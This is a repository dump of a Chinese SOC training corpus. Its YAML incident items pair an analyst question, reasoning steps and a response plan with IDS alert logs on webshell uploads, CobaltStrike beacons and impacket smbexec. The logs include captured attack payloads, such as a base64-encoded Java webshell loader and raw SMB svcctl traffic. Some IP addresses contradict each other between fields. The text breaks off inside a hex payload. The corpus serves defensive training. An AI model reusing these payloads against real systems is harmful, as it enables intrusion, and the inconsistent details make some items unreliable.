├── LICENSE
├── README.md
└── raw_corpus
├── BT
├── bt-003-webshell_upload_memory_shell.yaml
├── bt-004-cobaltstrike_beacon_http.yaml
└── bt-005-webshell_behinder_4_0.yaml
├── HT
├── ht-002-smbexec_remote_execution.yaml
├── ht-003-pystinger_tunnel_communication.yaml
├── ht-004-metasploit_payload_transmission.yaml
└── ht-005-neo_regeorg_tunnel_communication.yaml
├── IL
├── IL-002-web_root_directory_information_leakage.yaml
└── il-001-github_sensitive_information_leakage.yaml
├── MC
└── mc-001-mining_trojan_communication.yaml
├── README.md
├── VR
└── vr-001-exchange_proxylogon_cve_2021_27065.yaml
└── WA
├── wa-001-sql_injection_attack.yaml
├── wa-002-freemarker_template_injection.yaml
├── wa-003-python_unpickle_deserialization.yaml
└── wa-004-reverse_shell_attack.yaml
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2025 DeepSec
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DeepSec 语料库
2 |
3 | 本仓库为 DeepSec 项目托管的开源中文网络安全运营语料库,包含原始语料文件、处理脚本和处理后的输出数据,旨在支持安全运营场景下的大模型训练。
4 |
5 | ## 目录结构
6 |
7 | - `raw_corpus/`:原始YAML格式语料文件,按类别组织(如:漏洞响应、后门木马、钓鱼攻击、信息泄露)。
8 | - `scripts/`:用于语料转换和验证的 Python 脚本。
9 | - `dataset/`:处理后的最终 CSV/Excel 文件,供模型训练使用。
10 | - `docs/`:贡献者指南和文档。
11 |
12 | ## 快速开始
13 |
14 | 1. 克隆仓库:`git clone https://github.com/deepsec-top/deepsec.git`
15 | 2. 阅读 `docs/corpus_guidelines.md` 了解贡献规则。
16 | 3. 按照 `docs/file_naming_convention.md` 中的命名规范,通过拉取请求提交语料数据。
17 |
18 | 参考示例[`raw_corpus/IL/il-001-github_sensitive_information_leakage.yaml`](raw_corpus/IL/il-001-github_sensitive_information_leakage.yaml)
19 |
20 | ## 语料类别
21 |
22 | - 漏洞响应 (`VR`):网络安全漏洞响应事件
23 | - 后门木马 (`BT`):后门木马事件
24 | - 钓鱼攻击 (`FA`):钓鱼攻击事件
25 | - 信息泄露 (`IL`):信息泄露事件
26 | - 黑客工具 (`HT`):黑客工具使用事件
27 | - 软件供应链 (`SC`):软件供应链事件
28 | - Web攻击 (`WA`):Web攻击事件
29 | - 其他 (`OT`):其他事件
30 | - 持续补充优化中...
31 |
32 |
33 | ## 许可证
34 |
35 | MIT 许可证,详见 [`LICENSE`](LICENSE) 文件。
36 |
37 | ## 联系方式
38 |
39 | 邮箱:admin@deepsec.top
40 | 网站:[DeepSec 官网](https://deepsec.top)
41 | 加入社区:[DeepSec 社区](#)
--------------------------------------------------------------------------------
/raw_corpus/BT/bt-003-webshell_upload_memory_shell.yaml:
--------------------------------------------------------------------------------
1 | - ID: bt-003
2 | Category: 后门木马
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 额外的补充信息放到这里
8 | Title_CN: 后门木马-webshell-上传内存马通信
9 | Title_EN: backdoor-webshell_upload_memory_shell
10 | Question: |
11 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
12 | - 背景信息:攻击者通过POST请求,试图上传并执行一个名为 `shell4.jsp` 的恶意Webshell。该请求包含了大量的恶意负载,并且响应状态为200,表明请求成功。
13 | - 背景信息:该请求来源于 `110.10.19.119`,目标是 `172.19.12.6`,涉及到的协议为HTTP,且请求中包含了与内存马相关的流量。
14 | - 事件信息
15 | - 系统: Web应用(Java)
16 | - 攻击类型: Webshell探测
17 | - 来源IP: '110.10.19.119'
18 | - 目标IP: '172.19.12.6'
19 | - 请求方式: 'POST'
20 | - 请求路径: '/shell4.jsp'
21 | - 响应状态: '200'
22 |
23 | Complex_CoT: |
24 | 1. 确认目标Web应用是否存在上传漏洞,特别是针对文件上传的安全性评估。
25 | 2. 分析请求中包含的恶意代码,确认是否有Webshell被成功上传并执行。
26 | 3. 检查目标服务器的访问日志,排查是否有其他异常请求或重复访问行为。
27 | 4. 评估攻击者是否通过该漏洞获得了敏感数据或执行了其他恶意操作。
28 | 5. 检查服务器上是否有异常的进程或服务在运行,确认是否存在后门或持久化机制。
29 | 6. 复查是否存在任何敏感数据被访问或导出的记录,评估潜在信息泄露风险。
30 |
31 | Response: |
32 | 1. 立即隔离受影响的Web服务器(172.19.12.6),中断外部访问流量。
33 | 2. 审核该Web应用的文件上传功能,全面修复上传漏洞,更新到安全版本。
34 | 3. 分析响应内容及请求参数,确认是否有恶意代码被执行,必要时进行取证。
35 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
36 | 5. 利用威胁情报封禁110.10.19.119来源IP,检查是否命中已知攻击者活动轨迹。
37 | 6. 重新部署WAF与IDS策略,对疑似Webshell攻击路径增加高优先级告警。
38 | 7. 建议对全网Web应用资产开展基线扫描和统一补丁加固,防止类似攻击再次发生。
39 |
40 |
41 | Log Sample: |
42 | ```
43 | {
44 | "sendHostAddress": "10.9.45.124",
45 | "transProtocol": "TCP",
46 | "appProtocol": "http",
47 | "srcAddress": "110.10.19.119",
48 | "srcPort": "20033",
49 | "srcMacAddress": "8C-94-6A-79-80-99",
50 | "destMacAddress": "00-00-5E-00-01-02",
51 | "destAddress": "172.19.12.6",
52 | "destPort": "5678",
53 | "deviceAddress": "10.9.45.124",
54 | "eventCount": "1",
55 | "srcGeoCountry": "中国",
56 | "srcGeoLongitude": "116.401159",
57 | "srcGeoLatitude": "39.902798",
58 | "destGeoCountry": "中国",
59 | "destGeoRegion": "上海",
60 | "destGeoCity": "上海",
61 | "direction": "10",
62 | "attackerAddress": "srcAddress",
63 | "victimAddress": "destAddress",
64 | "attackDirection": "1",
65 | "attacker": ["110.10.19.119"],
66 | "victim": ["172.19.12.6"],
67 | "srcSecurityZone": "outer",
68 | "logType": "alert",
69 | "dataType": "ids",
70 | "dataSubType": "attackAlert",
71 | "catOutcome": "OK",
72 | "catTechnique": "/Code/ShellCommand",
73 | "severity": "7",
74 | "startTime": "2025-04-08 22:15:15",
75 | "endTime": "2025-04-08 22:15:15",
76 | "deviceReceiptTime": "2025-04-08 22:15:15",
77 | "collectorReceiptTime": "2025-04-08 22:15:15",
78 | "ruleName": "检测到利用黑客工具上传内存马通信",
79 | "ruleType": "/WebAttack/WebshellRequest",
80 | "alarmType": "WEB 后门访问 ->WEBSHELL 探测",
81 | "requestMethod": "POST",
82 | "requestUrlQuery": "/shell4.jsp",
83 | "requestUrl": "/shell4.jsp",
84 | "requestHeader": "POST /shell4.jsp HTTP/1.1
85 | Host: 211.136.166.51:5678
86 | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
87 | Content-Length: 6301
88 | Connection: close
89 | Content-Type: application/x-www-form-urlencoded
90 | Cookie: Line-Id=c8c66cf0bc4718a645b0e698d13f056f700a774eb7dda16ab2dd36364ee89dbbc6727dcbfd75536340844c013f2a2bbdf171c8a8ca079528dea515cd11e46aba
91 | Accept-Encoding: gzip
92 | ",
93 | "requestBody": "qSjvpaYH=yv66vgAAADEBCQoAOQB4CQBbAHkJAFsAeggAewkAWwB8CAB9CQBbAH4IAH8JAFsAgAoAWwCBBwCCCgALAHgIAIMIAIQIAIUIAIYLADMAhwsAMgCICwAzAIgLADIAiQoAWwCKCQBbAIsKAFsAjAoACwCNBwCOBwCPCgAaAHgIAJAKABoAkQoAGQCSCgAaAJILADMAkwoACwCSCgBbAJQKAJUAlggAlwoAmACZCACaCACbCgBbAJwIAJ0IAJ4KAEkAnwoAoAChCgCgAJIKABoAogoAOQCjCgA3AKQHAKUHAKYHAKcIAKgKADcAqQgAqgcAqwoANwCsBwCtCgCuAK8IALAIAFwKADcAsQoAsgCzCgCyALQIAF4KAFsAtQcAtggAtwcAuAkAuQC6CgCuALMKADcAuwoAuQC8BwC9CgA3AL4KAL8AwAoAOQCSCgC5AMEKAEkAwgoASQDDCgBJAMQIAMUIAMYKAEkAxwgAyAgAyQoANwDKCAByCADLCADMCgA3AM0HAM4BAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHZW5jb2RlcgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAmNzAQAMcmFuZG9tUHJlZml4AQAQZGVjb2RlckNsYXNzZGF0YQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAtTeXNJbmZvQ29kZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAPV3d3Um9vdFBhdGhDb2RlAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAhwYXJzZU9iagEAFShMamF2YS9sYW5nL09iamVjdDspVgEACGFzb3V0cHV0AQAGZGVjb2RlAQAKRXhjZXB0aW9ucwEAEkJhc2U2NERlY29kZVRvQnl0ZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAApTb3VyY2VGaWxlAQAJSW5mby5qYXZhDABlAGYMAFwAXQwAXgBfAQAGYmFzZTY0DABgAGEBAARVVEY4DABiAGEBAAEyDABjAGEMAG8AcAEAFmphdmEvbGFuZy9TdHJpbmdCdWZmZXIBAAc3ZjBhMzAyAQAMMjY3NDY3Mzc5NzczAQAOeGQ0MDVjYzU0MmRhZDMBAAl0ZXh0L2h0bWwMAM8A0AwA0QDQDADSAG4MAHIAbgwAZABhDABrAGwMANMA1AEAE2phdmEvbGFuZy9FeGNlcHRpb24BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgEACUVSUk9SOi8vIAwA0wDVDADWAGwMANcA2AwAcQBuBwDZDADaANABAAh1c2VyLmRpcgcA2wwA3ABuAQAHb3MubmFtZQEACXVzZXIubmFtZQwAbQBuAQABCQEAAS8MAN0A3gcA3wwA4ADhDADTAOIMAOMA5AwA5QDmAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAHWphdmF4LnNlcnZsZXQuanNwLlBhZ2VDb250ZXh0DADnAOgBAApnZXRSZXF1ZXN0AQAPamF2YS9sYW5nL0NsYXNzDADpAOoBABBqYXZhL2xhbmcvT2JqZWN0BwDrDADsAO0BAAtnZXRSZXNwb25zZQwA7gDvBwDwDADxAPIMAPMA9AwAdAB1AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2x",
94 | "responseHeader": "HTTP/1.1 200 OK
95 | Content-Length: 73
96 | Content-Type: text/html;charset=UTF8
97 | Date: Mon, 09 Aug 2021 03:49:59 GMT
98 | Set-Cookie: Line-Id=c8c66cf0bc4718a645b0e698d13f056f700a774eb7dda16ab2dd36364ee89dbbc6727dcbfd75536340844c013f2a2bbdf171c8a8ca079528dea515cd11e46aba; Path=/; Max-Age=10; HttpOnly
99 | Set-Cookie: JSESSIONID=6BC5DC60209B12F8E22AA61C5C2A0F7E; Path=/; HttpOnly
100 | Connection: close
101 | ",
102 | "responseMsg": "7f0a302/home/fairy/apache-tomcat-8.5.69/bin\x09/\x09Linux\x09fairy267467379773
103 | ",
104 | "responseCode": "200",
105 | "destHostName": "211.136.166.51:5678",
106 | "name": "检测到利用黑客工具上传内存马通信",
107 | "txId": "0",
108 | "confidence": "High",
109 | "httpVersion": "HTTP/1.1",
110 | "accessAgent": "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
111 | "attackStage": "3",
112 | "attackStatus": "1",
113 | "pcapRecord": "true",
114 | "tacticId": "TA0003",
115 | "techniquesId": "T1505",
116 | "subTechniquesId": "T1505.003",
117 | "message": "检测到利用黑客工具上传内存马通信。来源:110.10.19.119/20033, 目的:172.19.12.6/5678",
118 | "isAPT": "false",
119 | "killChain": "KC_CommandControl"
120 | }
121 | ```
--------------------------------------------------------------------------------
/raw_corpus/BT/bt-004-cobaltstrike_beacon_http.yaml:
--------------------------------------------------------------------------------
1 | - ID: bt-004
2 | Category: 后门木马
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - CobaltStrike Beacon HTTP通信检测
8 | - 典型的C2上线行为,需要重点关注
9 | Title_CN: 后门木马-CobaltStrike Beacon HTTP上线
10 | Title_EN: backdoor trojan - cobaltstrike beacon http
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:公有云主机环境,存在外部网络访问
14 | - 事件描述:检测到外部主机 101.20.10.14 使用HTTP协议访问内网主机 10.9.12.11 的路径 "/2cyN",目标端口为5679,返回状态码为200
15 | - 上下文:User-Agent 模拟常见浏览器特征(IE9),通信路径短小随机,响应类型为 application/octet-stream,符合CobaltStrike Beacon在上线阶段的通信特征
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 关联该主机历史网络行为,确认是否存在周期性C2回连流量,判断Beacon间隔和模式。
20 | 2. 检查10.9.12.11主机是否存在未知启动项或与CobaltStrike相关的已知恶意模块。
21 | 3. 使用流量分析工具(NTA/IDS)回溯近1小时内该主机其他HTTP连接特征。
22 | 4. 对101.20.10.14进行情报分析,识别是否为已知CobaltStrike基础设施或云渗透节点。
23 | 5. 核查是否还有其他主机向同一目标或相似路径(如/2xxN)发送请求,判断横向控制范围。
24 | 6. 判断该Beacon是否进入任务执行阶段(Stage 2/3),分析是否伴随命令下发或模块加载行为。
25 | 7. 结合MITRE ATT&CK T1071/T1095/T1102等技术分析链条完整性,并评估是否已造成权限获取或数据泄露。
26 |
27 | Response: |
28 | 1. 临时隔离目标主机10.9.12.11,防止其继续与潜在C2服务器通信。
29 | 2. 对101.20.10.14配置临时封禁策略,防止后续流量接入。
30 | 3. 导出完整HTTP通信流量及日志,提供威胁情报分析与回溯。
31 | 4. 使用EDR产品对目标主机执行全面检查,定位Beacon implant位置。
32 | 5. 更新防火墙与WAF策略,增加该类短路径+CobaltStrike特征通信规则。
33 | 6. 对整个网段内有外联行为的主机进行异常检测,识别是否存在多节点控制风险。
34 | 7. 启动应急响应流程,对本次事件进行分级处置并开展复盘,修复相关安全配置缺陷。
35 |
36 | Log_Sample: |
37 | ```
38 | {
39 | "transProtocol": "TCP",
40 | "appProtocol": "http",
41 | "srcAddress": "101.20.10.14",
42 | "srcPort": "20014",
43 | "destAddress": "10.9.12.11",
44 | "destPort": "5679",
45 | "eventCount": "1",
46 | "direction": "10",
47 | "attackerAddress": "srcAddress",
48 | "victimAddress": "destAddress",
49 | "attackDirection": "1",
50 | "attacker": ["101.20.10.14"],
51 | "victim": ["10.9.12.11"],
52 | "srcSecurityZone": "outer",
53 | "logType": "alert",
54 | "catOutcome": "OK",
55 | "severity": "7",
56 | "startTime": "2025-04-08 23:13:12",
57 | "endTime": "2025-04-08 23:13:12",
58 | "deviceReceiptTime": "2025-04-08 23:13:12",
59 | "collectorReceiptTime": "2025-04-08 23:13:12",
60 | "ruleName": "检测到CobaltStrike上线(beacon-http)",
61 | "alarmType": "可疑流量->可疑流量",
62 | "requestMethod": "GET",
63 | "requestUrlQuery": "/2cyN",
64 | "requestUrl": "/2cyN",
65 | "requestHeader": "GET /2cyN HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ESES)
Host: 39.96.50.58:7777
Connection: Keep-Alive
Cache-Control: no-cache
",
66 | "responseHeader": "HTTP/1.1 200 OK
Date: Fri, 18 Nov 2022 12:40:11 GMT
Content-Type: application/octet-stream
Content-Length: 211034
",
67 | "responseCode": "200",
68 | "destHostName": "39.96.50.58:7777",
69 | "name": "检测到CobaltStrike上线(beacon-http)",
70 | "txId": "0",
71 | "confidence": "High",
72 | "httpVersion": "HTTP/1.1",
73 | "accessAgent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ESES)",
74 | "attackStage": "2",
75 | "attackStatus": "1",
76 | "pcapRecord": "true",
77 | "message": "检测到CobaltStrike上线(beacon-http). 来源:101.20.10.14/20014, 目的:10.9.12.11/5679",
78 | "isAPT": "false",
79 | "killChain": "KC_CommandControl"
80 | }
81 | ```
--------------------------------------------------------------------------------
/raw_corpus/BT/bt-005-webshell_behinder_4_0.yaml:
--------------------------------------------------------------------------------
1 | - ID: bt-005
2 | Category: 后门木马
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 冰蝎4.0 PHP Webshell通信检测
8 | - 典型的Webshell后门通信行为
9 | Title_CN: 后门木马-冰蝎4.0 PHP Webshell通信
10 | Title_EN: backdoor trojan - behinder 4.0 php webshell
11 | Question: |
12 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
13 | - 组织背景:Web应用服务器环境,存在文件上传功能
14 | - 事件描述:攻击者通过POST请求,试图上传并执行一个名为 shell-xor-base64.php 的恶意Webshell,该请求包含了大量的恶意负载,响应状态为200,表明请求成功
15 | - 上下文:该请求来源于 110.10.19.119,目标是 172.19.12.6,涉及到的协议为HTTP,且请求中包含了与冰蝎4.0相关的流量特征
16 |
17 | 作为SOC团队的指挥官,请你对安全事件作出评估并决策。
18 | Complex_CoT: |
19 | 1. 确认目标Web应用是否存在上传漏洞,特别是针对文件上传的安全性评估。
20 | 2. 分析请求中包含的恶意代码,确认是否有Webshell被成功上传并执行。
21 | 3. 检查目标服务器的访问日志,排查是否有其他异常请求或重复访问行为。
22 | 4. 评估攻击者是否通过该漏洞获得了敏感数据或执行了其他恶意操作。
23 | 5. 检查服务器上是否有异常的进程或服务在运行,确认是否存在后门或持久化机制。
24 | 6. 复查是否存在任何敏感数据被访问或导出的记录,评估潜在信息泄露风险。
25 |
26 | Response: |
27 | 1. 立即隔离受影响的Web服务器(172.19.12.6),中断外部访问流量。
28 | 2. 审核该Web应用的文件上传功能,全面修复上传漏洞,更新到安全版本。
29 | 3. 分析响应内容及请求参数,确认是否有恶意代码被执行,必要时进行取证。
30 | 4. 回溯分析攻击时间点前后的日志,识别是否存在持久化机制或横向行为。
31 | 5. 利用威胁情报封禁110.10.19.119来源IP,检查是否命中已知攻击者活动轨迹。
32 | 6. 重新部署WAF与IDS策略,对疑似Webshell攻击路径增加高优先级告警。
33 | 7. 建议对全网Web应用资产开展基线扫描和统一补丁加固,防止类似攻击再次发生。
34 |
35 | Log_Sample: |
36 | ```
37 | {
38 | "sendHostAddress": "10.9.45.124",
39 | "transProtocol": "TCP",
40 | "appProtocol": "http",
41 | "srcAddress": "110.10.19.119",
42 | "srcPort": "20051",
43 | "srcMacAddress": "8C-94-6A-79-80-99",
44 | "destMacAddress": "00-00-5E-00-01-02",
45 | "destAddress": "172.19.12.6",
46 | "destPort": "5679",
47 | "deviceAddress": "10.9.45.124",
48 | "eventCount": "1",
49 | "srcGeoCountry": "中国",
50 | "srcGeoLongitude": "116.401159",
51 | "srcGeoLatitude": "39.902798",
52 | "destGeoCountry": "中国",
53 | "destGeoRegion": "上海",
54 | "destGeoCity": "上海",
55 | "direction": "10",
56 | "attackerAddress": "srcAddress",
57 | "victimAddress": "destAddress",
58 | "attackDirection": "1",
59 | "attacker": ["110.10.19.119"],
60 | "victim": ["172.19.12.6"],
61 | "srcSecurityZone": "outer",
62 | "logType": "alert",
63 | "dataType": "ids",
64 | "dataSubType": "attackAlert",
65 | "catOutcome": "OK",
66 | "catTechnique": "/Code/ShellCommand",
67 | "severity": "7",
68 | "startTime": "2025-04-08 23:15:42",
69 | "endTime": "2025-04-08 23:15:42",
70 | "deviceReceiptTime": "2025-04-08 23:15:42",
71 | "collectorReceiptTime": "2025-04-08 23:15:42",
72 | "ruleName": "检测到冰蝎4.0 通信流量(PHP)",
73 | "ruleType": "/WebAttack/WebshellRequest",
74 | "alarmType": "WEB后门访问->WEBSHELL 探测",
75 | "requestMethod": "POST",
76 | "requestUrlQuery": "/vul/unsafeupload/uploads/shell-xor-base64.php",
77 | "requestUrl": "/vul/unsafeupload/uploads/shell-xor-base64.php",
78 | "responseCode": "200",
79 | "destHostName": "39.96.50.58",
80 | "name": "检测到冰蝎4.0 通信流量(PHP)",
81 | "txId": "1",
82 | "confidence": "High",
83 | "httpVersion": "HTTP/1.1",
84 | "attackStage": "3",
85 | "attackStatus": "1",
86 | "pcapRecord": "true",
87 | "tacticId": "TA0003",
88 | "techniquesId": "T1505",
89 | "subTechniquesId": "T1505.003",
90 | "message": "检测到冰蝎4.0 通信流量(PHP). 来源:110.10.19.119/20051, 目的:172.19.12.6/5679",
91 | "isAPT": "false",
92 | "killChain": "KC_CommandControl"
93 | }
94 | ```
--------------------------------------------------------------------------------
/raw_corpus/HT/ht-002-smbexec_remote_execution.yaml:
--------------------------------------------------------------------------------
1 | - ID: ht-002
2 | Category: 黑客工具
3 | Created_At: 2025-04-29
4 | Contributors:
5 | - FOOL
6 | Additional_Info: |
7 | - 额外补充信息放到这里
8 | Title_CN: 黑客工具-smbexec执行远程命令
9 | Title_EN: hacker tool - smbexec remote execution
10 | Question: |
11 | 请以SOC团队的指挥官身份,评估并决策以下安全事件:
12 | - 背景信息:安全设备于2025-04-08 23:25检测到来自公网IP101.200.16.124向公司内网主机10.99.15.61发起 SMB 协议的远程命令执行行为。规则命中“检测到黑客工具impacket smbexec执行远程命令”。
13 | - 背景信息:日志payload包含svcctl,是smbexec依赖的远程服务控制器,且存在NTLMSSP身份验证字段,符合已知攻击特征。
14 | - 事件信息
15 | - 系统: 公司内网资产
16 | - 攻击类型: 横向移动-远程命令执行
17 | - 来源IP: '101.200.160.124'
18 | - 目标IP: '10.99.16.61'
19 | - 协议: 'SMB'
20 | - 目标端口: '5679'
21 | - 响应状态: '成功(catOutcome=OK)'
22 |
23 | Complex_CoT: |
24 | 1. 对受害主机 10.99.15.61 进行命令审计,确认是否执行过异常远程命令,检查审计日志、计划任务、注册表、服务启动项等。
25 | 2. 分析 SMB 日志中是否存在 NTLM 身份认证痕迹、IPC$共享会话记录、svcctl 服务远程启动字段,验证是否由 smbexec 工具发起。
26 | 3. 使用 NTA 或流量回溯工具还原数据包内容,分析 payload 中是否存在已知 impacket 工具通信签名(如:NTLMSSP, ADMIN-PC, svcctl, cifs)。
27 | 4. 追溯源IP在入侵前后的行为轨迹,包括是否存在其他主机访问尝试,判断是否为自动化横向扫描。
28 | 5. 调用内部威胁情报系统分析该攻击 IP(101.200.16.124)是否属于已知恶意攻击者,或存在其他攻击行为记录。
29 | 6. 若目标主机存在资产脆弱性,建议对该网段资产进行补丁管理或权限强化,防止类似攻击再次发生。
30 |
31 | Response: |
32 | 1. 临时隔离主机 10.99.15.61,防止进一步横向命令投递。
33 | 2. 在防火墙/IPS中封禁 101.200.160.124 的访问,并标记为已知攻击源。
34 | 3. 导出相关 SMB 通信日志及 payload,供安全分析人员进行深度取证。
35 | 4. 对 10.99.15.61 执行内存分析和系统完整性检测,确认是否有执行残留或后门部署。
36 | 5. 对同网段其他主机进行横向移动路径排查,检测是否存在同样攻击模式。
37 | 6. 在终端防护平台上更新 impacket smbexec 的检测规则,并强化 SMB 服务访问控制策略(如关闭不必要共享,启用强身份验证)。
38 | 7. 若发现凭据被窃取痕迹,建议触发企业级密码重置策略。
39 | 8. 汇报本次攻击事件,纳入 APT 演练/追踪机制并形成防御策略文档。
40 |
41 | Log Sample: |
42 | ```
43 | {
44 | "transProtocol": "TCP",
45 | "appProtocol": "smb",
46 | "srcAddress": "101.200.160.124",
47 | "srcPort": "20166",
48 | "destAddress": "10.99.15.61",
49 | "destPort": "5679",
50 | "eventCount": "1",
51 | "srcGeoCountry": "中国",
52 | "destGeoCountry": "中国",
53 | "destGeoRegion": "上海",
54 | "destGeoCity": "上海",
55 | "direction": "10",
56 | "attackerAddress": "srcAddress",
57 | "victimAddress": "destAddress",
58 | "attackDirection": "1",
59 | "attacker": ["101.200.160.124"],
60 | "victim": ["10.99.15.61"],
61 | "srcSecurityZone": "outer",
62 | "logType": "alert",
63 | "dataType": "ids",
64 | "dataSubType": "attackAlert",
65 | "catOutcome": "OK",
66 | "catTechnique": "/Code/Trojan",
67 | "severity": "7",
68 | "catSignificance": "/Informational/Alert",
69 | "eventId": "2504082325040000068147418690002",
70 | "startTime": "2025-04-08 23:25:04",
71 | "endTime": "2025-04-08 23:25:04",
72 | "deviceReceiptTime": "2025-04-08 23:25:04",
73 | "collectorReceiptTime": "2025-04-08 23:25:04",
74 | "ruleName": "检测到黑客工具impacket smbexec执行远程命令",
75 | "ruleType": "/LateralMov/RemoteExec",
76 | "alarmType": "远程控制->横向执行",
77 | "payload": "...E.SMBr............................\"..NT LM 0.12..SMB 2.002..SMB 2.???....j.SMB@...........................................................$.......@...AsyQfkjAUJnFEQro...................SMB@.......................................................................X.B.........`@..+......604..0..
+.....7..
.\". NTLMSSP..............................SMB@.......................................................................X.2.............0..*...&...\"NTLMSSP.........\\.......t.......@...
.
.R.......\\.......\".......W.O.R.K.G.R.O.U.P.a.d.m.i.n..[..p&...Q......UQoyivEQ...R.m..5...ny..................UQoyivEQ........A.D.M.I.N.-.P.C.....A.D.M.I.N.-.P.C.....A.d.m.i.n.-.P.C.....A.d.m.i.n.-.P.C.................c.i.f.s./.A.D.M.I.N.-.P.C............n.SMB@...............................................................H.&.\\.\\.1.7.2...1.6...1.3...8.1.\\.I.P.C.$......SMB@...........................................................9.......................................@...x...........s.v.c.c.t.l......SMB@.",
78 | "rawPayload": "00000045FF534D4272000000001801C8000000000000000000000000FFFF000000000000002200024E54204C4D20302E31320002534D4220322E3030320002534D4220322E3F3F3F000000006AFE534D4240000100000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000024000300010000004000000041737951666B6A41554A6E464551726F00000000000000000202100200030000009AFE534D42400001000000000001000000000000000000000002000000000000000000000000000000000000000000000000000000000000000000000000000000190000010000000000000000580042000000000000000000604006062B0601050502A0363034A00E300C060A2B06010401823702020AA22204204E544C4D5353500001000000050288A0000000000000000000000000000000000000018AFE534D42400001000000000001007F00000000000000000003000000000000000000000000000000090000000004000000000000000000000000000000000000190000010000000000000000580032010000000000000000A182012E3082012AA2820126048201224E544C4D5353500003000000180018005C000000AE00AE007400000012001200400000000A000A0052000000000000005C0000000000000022010000050288A057004F0052004B00470052004F0055005000610064006D0069006E00BD5B9CBB7026A7899F51F7C8D7A1B4D455516F7969764551E51D0E52886D128D359000C16E79E0120101000000000000A9D0FC0006F4D80155516F79697645510000000002001000410044004D0049004E002D005000430001001000410044004D0049004E002D005000430004001000410064006D0069006E002D005000430003001000410064006D0069006E002D005000430007000800A9D0FC0006F4D80109001A0063006900660073002F00410044004D0049004E002D005000430000000000000000000000006EFE534D42400001000000000003007F0000000000000000000400000000000000000000000000000009000000000400000000000000000000000000000000000009000000480026005C005C003100370032002E00310036002E00310033002E00380031005C00490050004300240000000084FE534D42400001000000000005007F00000000000000000005000000000000000000000001000000090000000004000000000000000000000000000000000000390000000200000000000000000000000000000000000000030000008000000001000000010000004000000078000C000000000000000000730076006300630074006C00000000B8FE534D42400001000000000009007F0000000000000000000600000000000000000000000100000009000000000400000000000000000000000000000000000031007000480000000000000000000000110000000000000001000000FFFFFFFF0000000000000000000000000000000005000B03100000004800000001000000B810B81000000000010000000000010081BB7A364498F135AD3298F03800100302000000045D888AEB1CC9119FE808002B1048600200000000000071FE534D42400010000000000008007F0000000000000000000700000000000000000000000100000009000000000400000000000000000000000000000000000031005000000010000000000000000000110000000000000001000000FFFFFFFF0000000000000000000000000000000030000000D8FE534D42400001000000000009007F0000000000000000001700000000000000000000000100000009000000000400000000000000000000000000000000000031007000680000000000000000000000110000000000000001000000FFFFFFFF00000000000000000000000000000000050000031000000068000000010000005000000000000F0002A80000060000000000000006000000440055004D004D005900000023D200000F000000000000000F000000530065007200760069006300650073004100630074006900760065000000BFBF3F00000000000071FE534D42400010000000000008007F0000000000000000001800000000000000000000000100000009000000000400000000000000000000000000000000000031005000000010000000000000000000110000000000000001000000FFFFFFFF00000000000000000000000000000000300000022CFE534D42400001000000000009007F0000000000000000002800000000000000000000000100000009000000000400000000000000000000000000000000000031007000BC010000000000000000000011000000000000000100000